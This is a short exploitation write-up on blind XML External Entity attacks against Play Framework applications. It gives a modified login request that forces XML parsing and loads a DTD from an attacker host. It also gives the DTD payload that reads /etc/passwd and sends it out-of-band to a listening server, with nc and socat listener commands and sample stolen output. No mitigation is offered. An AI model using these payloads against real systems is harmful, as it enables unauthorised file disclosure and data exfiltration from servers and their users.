play-framework-xml-external-entity-xxe-exploitation
Play Framework: XML External Entity (XXE) Exploitation
info
Play automatically parses XML requests when Content-Type: text/xml is used, even if the application logic does not require XML.
Root Cause
- XML entities are not disabled in Play’s XML parser.
- External entities can reference:
- Local files (
file:///) - Remote resources (
http://)
- Local files (
- The attack is blind: file contents are not shown in HTTP responses.
Exploitation Strategy
Because the attack is blind, data exfiltration is done via out-of-band (OOB) requests.
We will be needing 4 terminals for:
- Sending malicious XML request
- Host malicious DTD
- Receive exfiltrated data
- Debug/logging
Step 1: Send Malicious XML Request
Original Request:
POST /login HTTP/1.1
Host: rezydev.xyz
Content-Type: application/x-www-form-urlencoded
..snip..
username=test&password=test
Modified XML Request:
POST /login HTTP/1.1
Host: rezydev.xyz
Content-Type: text/xml
..snip..
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://ATTACKER_IP:3000/test.dtd">
<foo>&e1;</foo>
Which:
- Forces Play to parse XML
- Loads external DTD from attacker-controlled server
Step 2: Host Malicious DTD
DTD Payload (File Read)
<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://129.154.241.42:3001/BLAH?%p1;'>">
%p2;
Explanation
%p1reads the file%p2builds a new entity that sends file content via HTTP&e1;triggers exfiltration
Step 3: Receive Exfiltrated Data
Listener Options
nc -lvnp 3001
socat TCP-LISTEN:3001,reuseaddr,fork - ## Better
Result:
GET /BLAH?root:x:0:0:root:/root:/bin/sh...
URL-decode to view file contents.
info
Some XML parsers allow directory listing. So we can keep enumerating the files as well.